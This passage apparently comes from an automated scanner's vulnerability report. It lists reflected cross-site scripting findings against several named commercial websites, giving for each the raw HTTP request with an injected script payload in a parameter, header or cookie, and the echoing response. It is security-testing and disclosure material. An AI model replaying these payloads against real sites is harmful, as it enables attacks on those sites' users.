The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99035"><script>alert(1)</script>aad44ddd58a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/style.css99035"><script>alert(1)</script>aad44ddd58a HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:30:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/style.css99035"><script>alert(1)</script>aad44ddd58a" />
...[SNIP]...

5.78. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The value of the promoCodeRefIde request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee863'><script>alert(1)</script>c9c8e536919 was submitted in the promoCodeRefIde parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFTee863'><script>alert(1)</script>c9c8e536919&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10551

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<input type='hidden' name='promo' value='NXTIDF01IDEFTee863'><script>alert(1)</script>c9c8e536919'/>
...[SNIP]...

5.79. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The value of the promoCodeRefIde request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd735"><script>alert(1)</script>6c8574a0de7 was submitted in the promoCodeRefIde parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFTbd735"><script>alert(1)</script>6c8574a0de7&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10551

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<a href="/?promoRefCode=NXTIDF01IDEFTbd735"><script>alert(1)</script>6c8574a0de7" class="lp-get-ide-link">
...[SNIP]...

5.80. https://www.trustedid.com/idfide01/ [promoCodeRefIdf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The value of the promoCodeRefIdf request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5092'><script>alert(1)</script>11d7a4f151a was submitted in the promoCodeRefIdf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15c5092'><script>alert(1)</script>11d7a4f151a HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:14:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10480

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<input type='hidden' name='promo' value='NXTIDF01IDFFT15c5092'><script>alert(1)</script>11d7a4f151a'/>
...[SNIP]...

5.81. https://www.trustedid.com/suzeidprotector/ [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85c56"><script>alert(1)</script>0c0f9b808c2 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suzeidprotector/?first_name=&last_name=&email=85c56"><script>alert(1)</script>0c0f9b808c2 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<input type="text" validate="name" class="hp-form-field " value="85c56"><script>alert(1)</script>0c0f9b808c2" id="email" name="email" gtbfieldid="3">
...[SNIP]...

5.82. https://www.trustedid.com/suzeidprotector/ [first_name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3782"><script>alert(1)</script>f649900f46c was submitted in the first_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suzeidprotector/?first_name=e3782"><script>alert(1)</script>f649900f46c&last_name=&email= HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:54:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<input type="text" validate="name" class="hp-form-field " value="e3782"><script>alert(1)</script>f649900f46c" id="first_name" name="first_name" gtbfieldid="1">
...[SNIP]...

5.83. https://www.trustedid.com/suzeidprotector/ [last_name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The value of the last_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87203"><script>alert(1)</script>ef9dea1c101 was submitted in the last_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suzeidprotector/?first_name=&last_name=87203"><script>alert(1)</script>ef9dea1c101&email= HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:55:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<input type="text" validate="name" class="hp-form-field " value="87203"><script>alert(1)</script>ef9dea1c101" id="last_name" name="last_name" gtbfieldid="2">
...[SNIP]...

5.84. http://www.hotelclub.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12eb7"><script>alert(1)</script>7915b0ca952 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=12eb7"><script>alert(1)</script>7915b0ca952

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232790
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 13:13:24 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 13:13:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: AffiliateLogID=%2D1963682320; expires=Mon, 23-May-2011 14:00:00 GMT; path=/
Set-Cookie: anon=54655092954620110424230132; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQSSAQDRQ=AADPBCECPKGHNOFGNCIEEIBL; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273c45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<meta name="DCSext.rs" content="http://www.google.com/search?hl=en&q=12eb7"><script>alert(1)</script>7915b0ca952"/>
...[SNIP]...

5.85. http://www.nextadvisor.com/link.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 881a1"><script>alert(1)</script>c0ea8f8c816 was submitted in the Referer HTTP header. This input was echoed as 881a1\"><script>alert(1)</script>c0ea8f8c816 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
Referer: http://www.google.com/search?hl=en&q=881a1"><script>alert(1)</script>c0ea8f8c816

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:26:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 42552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="msvalidate.01
...[SNIP]...
<a href="/link.php?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1-fq-881a1\"><script>alert(1)</script>c0ea8f8c816&amp;category=voip&amp;link=vonage&amp;id=632 "target="_blank">
...[SNIP]...

5.86. http://www.nextadvisor.com/pmid [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f376"><script>alert(1)</script>f66b92f9263 was submitted in the Referer HTTP header. This input was echoed as 9f376\"><script>alert(1)</script>f66b92f9263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pmid?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
Referer: http://www.google.com/search?hl=en&q=9f376"><script>alert(1)</script>f66b92f9263

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:31:44 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1-fq-9f376\"><script>alert(1)</script>f66b92f9263">
...[SNIP]...

5.87. http://www.nextadvisor.com/pmid/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61957"><script>alert(1)</script>3ad037bb494 was submitted in the Referer HTTP header. This input was echoed as 61957\"><script>alert(1)</script>3ad037bb494 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
Referer: http://www.google.com/search?hl=en&q=61957"><script>alert(1)</script>3ad037bb494

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1-fq-61957\"><script>alert(1)</script>3ad037bb494">
...[SNIP]...

5.88. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 32dd0<script>alert(1)</script>545950acd64 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=194941096 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&; BMX_3PC=132dd0<script>alert(1)</script>545950acd64; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:30:13 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=3&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:30:13 2011&prad=253732016&arc=194941096&; expires=Sat 23-Jul-2011 12:30:13 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24957

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"194941096",Location:
...[SNIP]...
